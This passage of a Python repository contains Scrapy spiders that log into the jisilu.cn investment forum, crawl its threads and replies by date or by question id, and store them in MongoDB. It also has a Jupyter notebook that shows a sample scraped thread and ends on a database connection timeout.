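286 | # reply list is assumed to hold 100 replies per page, so the page count is
287 | # resp_no // 100 + 1.  `reply_page_count` is a hypothetical helper and is not
288 | # used by the spider itself.
289 | def reply_page_count(resp_no, page_size=100):
290 |     """Number of reply pages for a thread, e.g. 0 replies -> 1 page, 230 -> 3."""
291 |     return resp_no // page_size + 1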
--------------------------------------------------------------------------------
/jsl/spiders/allcontent.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import datetime
3 | import re
4 | import scrapy
5 | from scrapy import Request, FormRequest
6 | from jsl.items import JslItem
7 | from jsl import config
8 | import logging
9 | from jsl.spiders.aes_encode import decoder
10 | import pymongo
11 |
12 | # Crawl by date; newbie posts may be missed
13 |
14 | class AllcontentSpider(scrapy.Spider):
15 | name = 'allcontent'
16 |
17 | headers = {
18 | 'Host': 'www.jisilu.cn', 'Connection': 'keep-alive', 'Pragma': 'no-cache',
19 | 'Cache-Control': 'no-cache', 'Accept': 'application/json,text/javascript,*/*;q=0.01',
20 | 'Origin': 'https://www.jisilu.cn', 'X-Requested-With': 'XMLHttpRequest',
21 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36',
22 | 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
23 | 'Referer': 'https://www.jisilu.cn/login/',
24 | 'Accept-Encoding': 'gzip,deflate,br',
25 | 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8'
26 | }
27 |
28 | start_page = 1
29 |
30 |     POST_DATE_URL = 'https://www.jisilu.cn/home/explore/sort_type-add_time__category-__day-0__is_recommend-__page-{}'  # sorted by post date
31 |     RESP_DATE_URL = 'https://www.jisilu.cn/home/explore/sort_type-new__category-__day-0__is_recommend-__page-{}'  # sorted by latest reply date
32 | DETAIL_URL = 'https://www.jisilu.cn/question/{}&sort_key=agree_count&sort=DESC'
33 | MULTI_PAGE_DETAIL = 'https://www.jisilu.cn/question/id-{}__sort_key-__sort-DESC__uid-__page-{}'
34 |
35 | def __init__(self, daily='yes', *args, **kwargs):
36 | super().__init__(*args, **kwargs)
37 |
38 | if daily == 'yes':
39 | self.DAYS = config.DAYS
40 | self.URL = self.POST_DATE_URL
41 |
42 | elif daily == 'no':
43 |             # full-site crawl
44 |             self.logger.info('full-site crawl')
45 |             self.DAYS = 365 * 2  # fetch posts from the last 2 years
46 |             self.URL = self.RESP_DATE_URL  # paginate by latest reply time
47 | else:
48 | return
49 | self.last_week = datetime.datetime.now() + datetime.timedelta(days=-1 * self.DAYS)
50 |
51 |
52 | connect_uri = f'mongodb://{config.user}:{config.password}@{config.mongodb_host}:{config.mongodb_port}'
53 | self.db = pymongo.MongoClient(connect_uri)
54 |         # self.user = u'neo牛3'  # set this to the target username (e.g. 毛之川), then find the user id in the source of that user's page; e.g. 持有封基 is 8132
55 | self.collection = self.db[config.db_name][config.doc_name]
56 |
57 | def start_requests(self):
58 |
59 | login_url = 'https://www.jisilu.cn/login/'
60 | headersx = {
61 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
62 | 'Accept-Encoding': 'gzip,deflate,br', 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8',
63 | 'Cache-Control': 'no-cache', 'Connection': 'keep-alive',
64 | 'Host': 'www.jisilu.cn', 'Pragma': 'no-cache', 'Referer': 'https://www.jisilu.cn/',
65 | 'Upgrade-Insecure-Requests': '1',
66 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36'}
67 |
68 | yield Request(url=login_url, headers=headersx, callback=self.login, dont_filter=True)
69 |
70 | def login(self, response):
71 | url = 'https://www.jisilu.cn/account/ajax/login_process/'
72 | username = decoder(config.jsl_user)
73 | jsl_password = decoder(config.jsl_password)
74 | data = {
75 | 'return_url': 'https://www.jisilu.cn/',
76 | 'user_name': username,
77 | 'password': jsl_password,
78 | 'net_auto_login': '1',
79 | '_post_type': 'ajax',
80 | }
81 |
82 | yield FormRequest(
83 | url=url,
84 | headers=self.headers,
85 | formdata=data,
86 | callback=self.parse,
87 | dont_filter=True
88 | )
89 |
90 | def parse(self, response, **kwargs):
91 |         # print('after login', response.text)
92 | focus_url = self.URL.format(self.start_page)
93 |
94 | yield Request(url=focus_url, headers=self.headers, callback=self.parse_page, dont_filter=True,
95 | meta={'page': self.start_page})
96 |
97 | def parse_page(self, response):
98 |
99 | current_page = response.meta['page']
100 |
101 | nodes = response.xpath('//div[@class="aw-question-list"]/div')
102 | last_resp_date = None
103 |
104 | for node in nodes:
105 |
106 | each_url = node.xpath('.//h4/a/@href').extract_first()
107 | try:
108 | last_resp_date = node.xpath('.//div[@class="aw-questoin-content"]/span/text()').extract()[-1].strip()
109 | # '回复 • 2018-12-10 09:49 • 46335 次浏览'
110 | last_resp_date = re.search('• (.*?) •', last_resp_date).group(1)
111 | except:
112 | logging.error('failed to find date')
113 | continue
114 | else:
115 |                 # visit the detail page
116 |                 # rewrite the link to this form: 'https://www.jisilu.cn/question/320215&sort_key=agree_count&sort=DESC'
117 | # '"https://www.jisilu.cn/question/336326"'
118 | if re.search('www.jisilu.cn/question/\d+', each_url):
119 | question_id = re.search('www\.jisilu\.cn/question/(\d+)', each_url).group(1)
120 |
121 | # if self.question_exist(question_id):
122 | # continue
123 |
124 | # print(f'{question_id}帖子不存在,下载')
125 |
126 | last_resp_date = datetime.datetime.strptime(last_resp_date, '%Y-%m-%d %H:%M')
127 | yield Request(url=self.DETAIL_URL.format(question_id), headers=self.headers,
128 | callback=self.check_detail,
129 | meta={'last_resp_date': last_resp_date, 'question_id': question_id})
130 |
131 |         # keep paging through the listing
132 | # print(last_resp_date)
133 | if last_resp_date is not None and isinstance(last_resp_date,str):
134 | last_resp_date = datetime.datetime.strptime(last_resp_date, '%Y-%m-%d %H:%M')
135 |
136 | if last_resp_date is not None and (self.last_week < last_resp_date):
137 | # logging.info('last_resp_date ===== {}'.format(last_resp_date))
138 |
139 | current_page += 1
140 | yield Request(url=self.URL.format(current_page), headers=self.headers, callback=self.parse_page,
141 | meta={'page': current_page})
142 |
143 |     def question_exist(self, _id):
144 |         return self.collection.find_one({'question_id': _id}, {'_id': 1}) is not None
145 |
146 | def compose_content(self,content_list):
147 | string = ""
148 | for line in content_list:
149 | line = line.strip()
150 | if len(line)>0:
151 | string+=line+'\n'
152 | return string
153 |
154 | def check_detail(self, response):
155 |
156 |         if '您访问的资源需要购买会员' in response.text:  # member-only page, skip it
157 | return
158 |
159 | question_id = response.meta['question_id']
160 | last_resp_date=response.meta['last_resp_date']
161 | more_page = response.xpath('//div[@class="pagination pull-right"]')
162 |
163 | item = JslItem()
164 | item['last_resp_date'] = last_resp_date
165 |
166 | title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first()
167 | item['question_id'] = question_id
168 | content_node = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]')
169 |
170 |         content_html = content_node.extract_first()  # raw HTML of the post body
171 |
172 | # s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first()
173 | # ret = re.findall('(.*?)\.donate_user_avatar', s, re.S)
174 | # try:
175 | # content = ret[0].strip()
176 | # except Exception as e:
177 | # # logging.error(e)
178 | # content = None
179 |
180 | content_list = content_node.xpath('string(.)').extract()
181 | content_str = self.compose_content(content_list)
182 |
183 | createTime = response.xpath('//div[@class="aw-question-detail-meta"]/div/span/text()').extract_first()
184 | # 'aw-question-detail-meta'
185 | resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+')
186 |
187 | url = response.url
188 |
189 |         # add the thread creator
190 | try:
191 | item['creator'] = response.xpath('//div[@class="aw-side-bar-mod-body"]/dl/dd/a/text()').extract_first()
192 | except Exception as e:
193 | # logging.error(e)
194 | item['creator'] = None
195 |
196 | item['title'] = title.strip()
197 | item['content'] = content_str
198 | item['content_html'] = content_html
199 |
200 | try:
201 | item['resp_no'] = int(resp_no)
202 | except Exception as e:
203 |             # logging.warning('no replies')
204 | item['resp_no'] = 0
205 | if createTime is None:
206 | # print(title)
207 | # print(content)
208 | return
209 | item['createTime'] = createTime.replace('发表时间 ', '')
210 | item['crawlTime'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
211 | item['url'] = url.strip().replace('&sort_key=agree_count&sort=DESC','')
212 |
213 |         # replies span multiple pages
214 | if more_page:
215 |
216 | total_resp_no = item['resp_no']
217 | total_page = total_resp_no // 100 + 1
218 | item['resp'] = []
219 |
220 | yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, 1), headers=self.headers,
221 | callback=self.multi_page_detail,
222 | meta={'question_id': question_id, 'page': 1, 'total_page': total_page,
223 | 'item': item})
224 |
225 | else:
226 |
227 | resp_ = []
228 |             # reply content
229 | for index, reply in enumerate(
230 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
231 | replay_user = reply.xpath(
232 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
233 | rep_content = reply.xpath(
234 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath(
235 | 'string(.)').extract_first()
236 | # rep_content = '\n'.join(rep_content)
237 |
238 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
239 | if agree is None:
240 | agree = 0
241 | else:
242 | agree = int(agree)
243 |
244 | resp_.append(
245 | {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}})
246 |
247 | item['resp'] = resp_
248 | item['only_add']=True
249 |
250 | yield item
251 |
252 |     # reply detail pages
253 | def multi_page_detail(self, response):
254 |
255 | current_page = response.meta['page']
256 | item = response.meta['item']
257 | total_page = response.meta['total_page']
258 | question_id = response.meta['question_id']
259 |
260 | resp_len = response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]/div')
261 |
262 | for index, reply in enumerate(
263 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
264 | replay_user = reply.xpath(
265 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
266 | rep_content = reply.xpath(
267 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath(
268 | 'string(.)').extract_first()
269 | if rep_content:
270 | rep_content = rep_content.strip()
271 | # rep_content = '\n'.join(rep_content)
272 |
273 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
274 | if agree is None:
275 | agree = 0
276 | else:
277 | agree = int(agree)
278 |
279 | item['resp'].append(
280 |                 {replay_user.strip(): {'agree': agree, 'resp_content': rep_content}})
281 |
282 | current_page += 1
283 | # item['resp_no']=len(item['resp'])
284 | if current_page <= total_page:
285 | yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, current_page), headers=self.headers,
286 | callback=self.multi_page_detail,
287 | meta={'question_id': question_id, 'page': current_page, 'total_page': total_page,
288 | 'item': item})
289 | else:
290 | item['only_add']=True
291 | yield item
292 |
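293 |
294 | # A minimal sketch of the stop condition in parse_page() above: paging
295 | # continues only while the last thread's reply date on the listing page is
296 | # still inside the crawl window (config.DAYS days for the daily run, roughly
297 | # two years for the full-site run).  `within_crawl_window` is a hypothetical
298 | # helper and is not used by the spider itself.
299 | def within_crawl_window(last_resp_date, days):
300 |     """True if `last_resp_date` (a datetime) is newer than `days` days ago."""
301 |     cutoff = datetime.datetime.now() - datetime.timedelta(days=days)
302 |     return last_resp_date > cutoff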
--------------------------------------------------------------------------------
/jsl/spiders/questions.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import datetime
3 | import re
4 | import scrapy
5 | from scrapy import Request, FormRequest
6 | from jsl.items import JslItem
7 | from jsl import config
8 | import logging
9 | import pymongo
10 |
11 | # Walk through all question ids to see where to start
12 | class QuestionSpider(scrapy.Spider):
13 | name = 'questions'
14 |
15 | headers = {
16 | 'Host': 'www.jisilu.cn', 'Connection': 'keep-alive', 'Pragma': 'no-cache',
17 | 'Cache-Control': 'no-cache', 'Accept': 'application/json,text/javascript,*/*;q=0.01',
18 | 'Origin': 'https://www.jisilu.cn', 'X-Requested-With': 'XMLHttpRequest',
19 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36',
20 | 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
21 | 'Referer': 'https://www.jisilu.cn/login/',
22 | 'Accept-Encoding': 'gzip,deflate,br',
23 | 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8'
24 | }
25 |
26 |     POST_DATE_URL = 'https://www.jisilu.cn/home/explore/sort_type-add_time__category-__day-0__is_recommend-__page-{}'  # sorted by post date
27 |     RESP_DATE_URL = 'https://www.jisilu.cn/home/explore/sort_type-new__category-__day-0__is_recommend-__page-{}'  # sorted by latest reply date
28 | DETAIL_URL = 'https://www.jisilu.cn/question/{}&sort_key=agree_count&sort=DESC'
29 | MULTI_PAGE_DETAIL = 'https://www.jisilu.cn/question/id-{}__sort_key-__sort-DESC__uid-__page-{}'
30 |
31 | # self.doc =
32 | connect_uri = f'mongodb://{config.user}:{config.password}@{config.mongodb_host}:{config.mongodb_port}'
33 | db = pymongo.MongoClient(connect_uri)
34 |     # self.user = u'neo牛3'  # set this to the target username (e.g. 毛之川), then find the user id in the source of that user's page; e.g. 持有封基 is 8132
35 | # self.collection = self.db['db_parker']['jsl_20181108_allQuestion_test']
36 | collection = db['db_parker'][config.doc_name]
37 |
38 | def start_requests(self):
39 | login_url = 'https://www.jisilu.cn/login/'
40 | headers = {
41 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
42 | 'Accept-Encoding': 'gzip,deflate,br', 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8',
43 | 'Cache-Control': 'no-cache', 'Connection': 'keep-alive',
44 | 'Host': 'www.jisilu.cn', 'Pragma': 'no-cache', 'Referer': 'https://www.jisilu.cn/',
45 | 'Upgrade-Insecure-Requests': '1',
46 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36'}
47 |
48 | yield Request(url=login_url, headers=headers, callback=self.login, dont_filter=True)
49 |
50 | def login(self, response):
51 | url = 'https://www.jisilu.cn/account/ajax/login_process/'
52 | data = {
53 | 'return_url': 'https://www.jisilu.cn/',
54 | 'user_name': config.jsl_user,
55 | 'password': config.jsl_password,
56 | 'net_auto_login': '1',
57 | '_post_type': 'ajax',
58 | }
59 |
60 | yield FormRequest(
61 | url=url,
62 | headers=self.headers,
63 | formdata=data,
64 | callback=self.parse,
65 | )
66 |
67 |     def question_exist(self, _id):
68 |         return self.collection.find_one({'question_id': _id}, {'_id': 1}) is not None
69 |
70 | def parse(self, response,**kwargs):
71 |         lastest_id = config.LASTEST_ID  # starting point for the id sweep below
72 |
73 | for i in range(lastest_id + 5000, 1, -1):
74 |             if not self.question_exist(str(i)):
75 | focus_url = 'https://www.jisilu.cn/question/{}'.format(i)
76 | yield Request(url=focus_url, headers=self.headers, callback=self.parse_item, meta={'question_id': str(i)})
77 | def compose_content(self,content_list):
78 | string = ""
79 | for line in content_list:
80 | line = line.strip()
81 | if len(line)>0:
82 | string+=line+'\n'
83 | return string
84 |
85 | def parse_item(self, response):
86 | item = JslItem()
87 | question_id = response.meta['question_id']
88 |
89 | title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first()
90 |
91 | # s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first()
92 |
93 | # if s:
94 | # ret = re.findall('(.*?)\.donate_user_avatar', s, re.S)
95 | # else:
96 | # ret = None
97 |
98 | # try:
99 | # content = ret[0].strip()
100 | # except:
101 | # content = None
102 |
103 |
104 | content_node = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]')
105 |
106 | content_html = content_node.extract_first() # 获取到源码
107 |
108 | # s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first()
109 | # ret = re.findall('(.*?)\.donate_user_avatar', s, re.S)
110 | # try:
111 | # content = ret[0].strip()
112 | # except Exception as e:
113 | # # logging.error(e)
114 | # content = None
115 |
116 | content_list = content_node.xpath('string(.)').extract()
117 | content_str = self.compose_content(content_list)
118 |
119 |
120 |
121 | createTime = response.xpath('//div[@class="aw-question-detail-meta"]/div/span/text()').extract_first()
122 | if createTime is None:
123 | return
124 |
125 | resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+')
126 |
127 | url = response.url
128 |
129 |         # add the thread creator
130 | try:
131 | item['creator'] = response.xpath('//div[@class="aw-side-bar-mod-body"]/dl/dd/a/text()').extract_first()
132 | except Exception as e:
133 | print(e)
134 | item['creator'] = None
135 |
136 |
137 | try:
138 | title = title.strip()
139 | except Exception as e:
140 | title = None
141 |
142 | item['content'] = content_str
143 |
144 | item['content_html'] = content_html
145 |
146 | try:
147 | item['resp_no'] = int(resp_no)
148 | except Exception as e:
149 | # logging.warning(e)
150 |             # logging.warning('no replies')
151 | item['resp_no'] = 0
152 |
153 | item['title'] = title
154 | item['question_id'] = question_id
155 |
156 | createTime = createTime.strip()
157 |
158 | if not re.search('^\d', createTime):
159 | createTime = createTime.replace('发表时间 ', '')
160 | # createTime = None
161 |             # self.logger.error('invalid creation date: {}'.format(url))
162 |         if not re.match('\d{4}-\d{2}-\d{2} \d{2}:\d{2}', createTime):
163 |             self.logger.error('invalid creation date: {}'.format(url))
164 | self.logger.error(createTime)
165 | createTime = None
166 | #
167 | item['createTime'] = createTime
168 | item['url'] = url.strip().replace('&sort_key=agree_count&sort=DESC','')
169 |
170 | resp = []
171 | last_resp_date = None
172 | for index, reply in enumerate(
173 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
174 | replay_user = reply.xpath('.//div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
175 |
176 | if last_resp_date is None:
177 | last_resp_date = reply.xpath('.//div[@class="aw-dynamic-topic-meta"]/span/text()').extract_first()
178 |
179 | rep_content = reply.xpath(
180 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]/text()').extract_first()
181 | # print rep_content
182 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
183 | try:
184 | int(agree)
185 | except:
186 | agree = 0
187 |
188 |             resp.append({replay_user.strip() + '_{}'.format(index): [int(agree), rep_content.strip() if rep_content else '']})
189 | # item['html'] = response.text
190 | item['crawlTime'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
191 |
192 | item['resp'] = resp
193 | item['last_resp_date'] = last_resp_date
194 | item['only_add'] = True
195 | yield item
196 |
197 | def check_detail(self, response):
198 |
199 |         if '您访问的资源需要购买会员' in response.text:  # member-only page, skip it
200 | return
201 |
202 | question_id = response.meta['question_id']
203 | more_page = response.xpath('//div[@class="pagination pull-right"]')
204 |
205 | item = JslItem()
206 |         last_resp_date = None  # filled in later
207 |
208 | item['last_resp_date'] = last_resp_date
209 | title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first()
210 | s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first()
211 | ret = re.findall('(.*?)\.donate_user_avatar', s, re.S)
212 | item['question_id'] = question_id
213 |
214 | try:
215 | content = ret[0].strip()
216 | except Exception as e:
217 | logging.error(e)
218 | content = None
219 |
220 | createTime = response.xpath('//div[@class="aw-question-detail-meta"]/div/span/text()').extract_first()
221 | # 'aw-question-detail-meta'
222 | resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+')
223 |
224 | url = response.url
225 |
226 | # 添加发起人
227 | try:
228 | item['creator'] = response.xpath('//div[@class="aw-side-bar-mod-body"]/dl/dd/a/text()').extract_first()
229 | except Exception as e:
230 | logging.error(e)
231 | item['creator'] = None
232 |
233 | item['title'] = title.strip()
234 | item['content'] = content
235 | try:
236 | item['resp_no'] = int(resp_no)
237 | except Exception as e:
238 |             # logging.warning('no replies')
239 | item['resp_no'] = 0
240 |
241 | item['createTime'] = createTime.replace('发表时间 ', '')
242 | item['crawlTime'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
243 | item['url'] = url.strip()
244 | # item['html'] = response.text
245 | item['last_resp_date'] = response.meta['last_resp_date']
246 |
247 |         # replies span multiple pages
248 | if more_page:
249 |
250 | total_resp_no = item['resp_no']
251 | total_page = total_resp_no // 100 + 1
252 | item['resp'] = []
253 |
254 | yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, 1), headers=self.headers,
255 | callback=self.multi_page_detail,
256 | meta={'question_id': question_id, 'page': 1, 'total_page': total_page,
257 | 'item': item})
258 |
259 | else:
260 |
261 | resp_ = []
262 |             # reply content
263 | for index, reply in enumerate(
264 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
265 | replay_user = reply.xpath(
266 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
267 | rep_content = reply.xpath(
268 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath(
269 | 'string(.)').extract_first()
270 | # rep_content = '\n'.join(rep_content)
271 |
272 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
273 | if agree is None:
274 | agree = 0
275 | else:
276 | agree = int(agree)
277 |
278 | resp_.append(
279 | {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}})
280 |
281 | item['resp'] = resp_
282 |
283 | yield item
284 |
285 |     # reply detail pages
286 | def multi_page_detail(self, response):
287 |
288 | current_page = response.meta['page']
289 | item = response.meta['item']
290 | total_page = response.meta['total_page']
291 | question_id = response.meta['question_id']
292 |
293 | resp_len = response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]/div')
294 |
295 | for index, reply in enumerate(
296 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
297 | replay_user = reply.xpath(
298 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
299 | rep_content = reply.xpath(
300 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath(
301 | 'string(.)').extract_first()
302 | if rep_content:
303 | rep_content = rep_content.strip()
304 | # rep_content = '\n'.join(rep_content)
305 |
306 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
307 | if agree is None:
308 | agree = 0
309 | else:
310 | agree = int(agree)
311 |
312 | item['resp'].append(
313 |                 {replay_user.strip(): {'agree': agree, 'resp_content': rep_content}})
314 |
315 | current_page += 1
316 |
317 | if current_page <= total_page:
318 | yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, current_page), headers=self.headers,
319 | callback=self.multi_page_detail,
320 | meta={'question_id': question_id, 'page': current_page, 'total_page': total_page,
321 | 'item': item})
322 | else:
323 | yield item
324 |
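325 |
326 | # A minimal sketch of the id sweep in parse() above: question ids are walked
327 | # downward from config.LASTEST_ID + 5000, and ids already stored in MongoDB
328 | # are skipped via question_exist().  `missing_question_urls` is a hypothetical
329 | # generator mirroring that logic and is not used by the spider itself.
330 | def missing_question_urls(collection, lastest_id, lookahead=5000):
331 |     """Yield detail-page URLs for question ids not yet present in `collection`."""
332 |     for i in range(lastest_id + lookahead, 1, -1):
333 |         if not collection.find_one({'question_id': str(i)}, {'_id': 1}):
334 |             yield 'https://www.jisilu.cn/question/{}'.format(i)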
--------------------------------------------------------------------------------
/数据迁移.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "code",
5 | "execution_count": 30,
6 | "metadata": {},
7 | "outputs": [],
8 | "source": [
9 | "import pymongo\n",
10 | "from elasticsearch import Elasticsearch"
11 | ]
12 | },
13 | {
14 | "cell_type": "code",
15 | "execution_count": 31,
16 | "metadata": {},
17 | "outputs": [],
18 | "source": [
19 | "db = pymongo.MongoClient('10.18.6.46',27001)"
20 | ]
21 | },
22 | {
23 | "cell_type": "code",
24 | "execution_count": 32,
25 | "metadata": {},
26 | "outputs": [],
27 | "source": [
28 | "es = Elasticsearch(['10.18.6.102:9200'])"
29 | ]
30 | },
31 | {
32 | "cell_type": "code",
33 | "execution_count": 11,
34 | "metadata": {},
35 | "outputs": [],
36 | "source": [
37 | "doc = db['db_parker']['jsl']"
38 | ]
39 | },
40 | {
41 | "cell_type": "code",
42 | "execution_count": 12,
43 | "metadata": {},
44 | "outputs": [],
45 | "source": [
46 | "item = doc.find_one()"
47 | ]
48 | },
49 | {
50 | "cell_type": "code",
51 | "execution_count": 13,
52 | "metadata": {
53 | "scrolled": true
54 | },
55 | "outputs": [
56 | {
57 | "data": {
58 | "text/plain": [
59 | "{'_id': ObjectId('5c249f29c4c05d4ba4bfa49d'),\n",
60 | " 'creator': 'greatbear',\n",
61 | " 'title': '各位研究技术指标有什么心得体会?',\n",
62 | " 'content': '各位研究技术指标多久了?研究这东西,能帮炒股赚钱么:)',\n",
63 | " 'resp_no': 11,\n",
64 | " 'createTime': '2018-12-14 08:38',\n",
65 | " 'crawlTime': '2019-03-16 09:54:43',\n",
66 | " 'url': 'https://www.jisilu.cn/question/297952',\n",
67 | " 'resp': [{'seeker24680_0': ['0', '可以说很多不明觉厉的词,适合用于忽悠别人,具体效果同风水先生。']},\n",
68 | " {'joyfulli_1': ['0',\n",
69 | " '首先要知道技术指标是怎么来的\\n对过去的数据进行统计分析,然后进行预测\\n说白了就是统计学\\n所以,学过统计学就知道技术分析怎么用了']},\n",
70 | " {'老高0813_2': ['0', '基本没卵用']},\n",
71 | " {'z383788052_3': ['0', '从来只看指标,只看k']},\n",
72 | " {'花园小琴_4': ['0', '看图形,一般只看低买高卖,但事后后悔,赚少了']},\n",
73 | " {'风险搬运工_5': ['0', '趋势(多和空)和震荡结合得做(同时做),不做单边、所谓轮动策略。\\n倾向于胜率低,赔率高的策略。']},\n",
74 | " {'smag_6': ['0', '基本不看指标,静下心感受波动,在波动中下注。。。']},\n",
75 | " {'海浪头头_7': ['0', '同意美棠子的看法']},\n",
76 | " {'jsl0900_8': ['0', '从技术指标上看,我可以预测所有交易标的的后续走势,至于准确不准确,那不是我关心的问题']},\n",
77 | " {'美棠子_9': ['4', '只是个辅助工具,基本面是核心,切不可颠倒主次。']},\n",
78 | " {'蔓越橘_10': ['0', '用于T一下可以,其他就算了吧。']}],\n",
79 | " 'last_resp_date': '2018-12-14 10:14'}"
80 | ]
81 | },
82 | "execution_count": 13,
83 | "metadata": {},
84 | "output_type": "execute_result"
85 | }
86 | ],
87 | "source": [
88 | "item"
89 | ]
90 | },
91 | {
92 | "cell_type": "code",
93 | "execution_count": 14,
94 | "metadata": {},
95 | "outputs": [],
96 | "source": [
97 | "keys= item.keys()"
98 | ]
99 | },
100 | {
101 | "cell_type": "code",
102 | "execution_count": 15,
103 | "metadata": {},
104 | "outputs": [
105 | {
106 | "data": {
107 | "text/plain": [
108 | "dict_keys(['_id', 'creator', 'title', 'content', 'resp_no', 'createTime', 'crawlTime', 'url', 'resp', 'last_resp_date'])"
109 | ]
110 | },
111 | "execution_count": 15,
112 | "metadata": {},
113 | "output_type": "execute_result"
114 | }
115 | ],
116 | "source": [
117 | "keys"
118 | ]
119 | },
120 | {
121 | "cell_type": "code",
122 | "execution_count": 34,
123 | "metadata": {},
124 | "outputs": [],
125 | "source": [
126 | "save_db = db['db_parker']['jsl_note']"
127 | ]
128 | },
129 | {
130 | "cell_type": "code",
131 | "execution_count": 24,
132 | "metadata": {},
133 | "outputs": [],
134 | "source": [
135 | "import datetime"
136 | ]
137 | },
138 | {
139 | "cell_type": "code",
140 | "execution_count": 37,
141 | "metadata": {
142 | "scrolled": true
143 | },
144 | "outputs": [
145 | {
146 | "ename": "AutoReconnect",
147 | "evalue": "10.18.6.46:27001: [WinError 10060] 由于连接方在一段时间后没有正确答复或连接的主机没有反应,连接尝试失败。",
148 | "output_type": "error",
149 | "traceback": [
150 | "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
151 | "\u001b[1;31mTimeoutError\u001b[0m Traceback (most recent call last)",
152 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\pool.py\u001b[0m in \u001b[0;36mreceive_message\u001b[1;34m(self, request_id)\u001b[0m\n\u001b[0;32m 609\u001b[0m return receive_message(self.sock, request_id,\n\u001b[1;32m--> 610\u001b[1;33m self.max_message_size)\n\u001b[0m\u001b[0;32m 611\u001b[0m \u001b[1;32mexcept\u001b[0m \u001b[0mBaseException\u001b[0m \u001b[1;32mas\u001b[0m \u001b[0merror\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
